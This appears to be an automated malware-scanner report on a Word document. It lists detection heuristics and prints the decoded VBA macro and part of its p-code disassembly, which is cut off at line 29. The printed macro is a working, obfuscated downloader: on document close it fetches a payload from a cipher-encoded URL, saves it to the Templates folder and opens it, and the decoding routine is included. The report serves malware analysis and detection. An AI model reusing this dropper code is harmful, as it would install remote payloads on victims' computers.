MALICIOUS
242
Risk Score
Heuristics 7
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set WshShell = CreateObject("WScript.Shell") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹ = ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set WshShell = CreateObject("WScript.Shell") -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24355 bytes |
SHA-256: cac2db46523a6c652c66ced50f4410f6b39c7be6c990c6acd3138c98e62cb3d2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim °©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤ As Integer
°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤ = Chr(50) + Chr(48) + Chr(48)
Dim WshShell As Object
Dim bSpecialPathkjbksd As String
Set WshShell = CreateObject("WScript.Shell")
bSpecialPathkjbksd = WshShell.SpecialFolders("Templates")
Dim ©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼
Dim °©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹
Dim ¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º
Dim ¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯
Dim ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
Dim ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ As Integer
Dim ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª
Dim §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ = 1
Set ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª = CreateObject("microsoft.xmlhttp")
Set ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥ = CreateObject("Shell.Application")
¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯ = bSpecialPathkjbksd + º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥("\NM¶àãH.ÂÛÂ")
½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.Open "get", º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥("hÖÖÓ://ÓÂÀÁÂzÒÅÂÃlÒw.ÜdÅÕ.ÂÙ/mbÄÅÄgbÀÂÖ/ÕwÒÅdbdb.ÂÛÂ"), False
½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.send
°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹ = ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.responseBody
If ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.Status = 200 Then
Set ©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼ = CreateObject("adodb.stream")
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.Open
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.Type = ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.Write °©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.SaveToFile ¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯, ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ + ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.Close
End If
¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥.Open (¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯)
End Sub
Public Function º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥(«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´)
¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°» = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåض§Ú¥"
«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»² = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
For i = 1 To Len(«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´)
¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿© = InStr(¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°», Mid(«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´, i, 1))
If ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿© > 0 Then
²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨ = Mid(«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»², ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©, 1)
¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ = ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ + ²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨
Else
¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ = ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ + Mid(«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´, i, 1)
End If
Next
º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥ = ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££
End Function
' Processing file: /opt/analyzer/scan_staging/54addf95cc01449d864bb01faf8378b1.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4959 bytes
' Line #0:
' FuncDefn (Private Sub cSpecialPathjhbkvhj())
' Line #1:
' Dim
' VarDefn ¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯ (As Integer)
' Line #2:
' LitDI2 0x0032
' ArgsLd SpecialFolders 0x0001
' LitDI2 0x0030
' ArgsLd SpecialFolders 0x0001
' Add
' LitDI2 0x0030
' ArgsLd SpecialFolders 0x0001
' Add
' St ¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯
' Line #3:
' Dim
' VarDefn ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½ (As Object)
' Line #4:
' Dim
' VarDefn id_034A (As String)
' Line #5:
' Line #6:
' SetStmt
' LitStr 0x000D "WScript.Shell"
' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001
' Set ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½
' Line #7:
' LitStr 0x0009 "Templates"
' Ld ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½
' ArgsMemLd µ¼º°¸§§¹¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º 0x0001
' St id_034A
' Line #8:
' Dim
' VarDefn ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' Line #9:
' Dim
' VarDefn ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
' Line #10:
' Dim
' VarDefn ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª
' Line #11:
' Dim
' VarDefn §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
' Line #12:
' Dim
' VarDefn º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥
' Line #13:
' Dim
' VarDefn «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´ (As Integer)
' Line #14:
' Dim
' VarDefn ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' Line #15:
' Dim
' VarDefn «§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²
' Line #16:
' LitDI2 0x0001
' St «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' SetStmt
' LitStr 0x0011 "microsoft.xmlhttp"
' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001
' Set ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' Line #22:
' SetStmt
' LitStr 0x0011 "Shell.Application"
' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001
' Set º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥
' Line #23:
' Line #24:
' Ld id_034A
' LitStr 0x000B "\NM¶àãH.ÂÛÂ"
' ArgsLd ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿© 0x0001
' Add
' St §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
' Line #25:
' LitStr 0x0003 "get"
' LitStr 0x0034 "hÖÖÓ://ÓÂÀÁÂzÒÅÂÃlÒw.ÜdÅÕ.ÂÙ/mbÄÅÄgbÀÂÖ/ÕwÒÅdbdb.ÂÛÂ"
' ArgsLd ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿© 0x0001
' LitVarSpecial (False)
' Ld ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' ArgsMemCall Open 0x0003
' Line #26:
' Ld ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' ArgsMemCall ¨²¾·¼¥¨º»¡»¾«½°¶·¶¹¨¥¡®¥¦´¶¸³®¥©¼²´¿²µ¼º°¸§§¹¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸ 0x0000
' Line #27:
' Ld ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' MemLd ¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½º´©¤£¤¢
' St ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
' Line #28:
' Ld ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' MemLd ª¯ª¸¿¿¦¤¢§¸¯¼³¨¦¶¨¦³¹©¢©½¡¼»£®¤«©¶©£¦µ³¯¢½¹¶½¨²¾·¼¥¨º»¡»¾«½°¶·¶¹¨¥¡®¥¦´¶¸³®¥©¼²´¿²µ¼º°¸§§
' LitDI2 0x00C8
' Eq
' IfBlock
' Line #29:
' SetStmt
' LitStr 0x000C "adodb.stream"
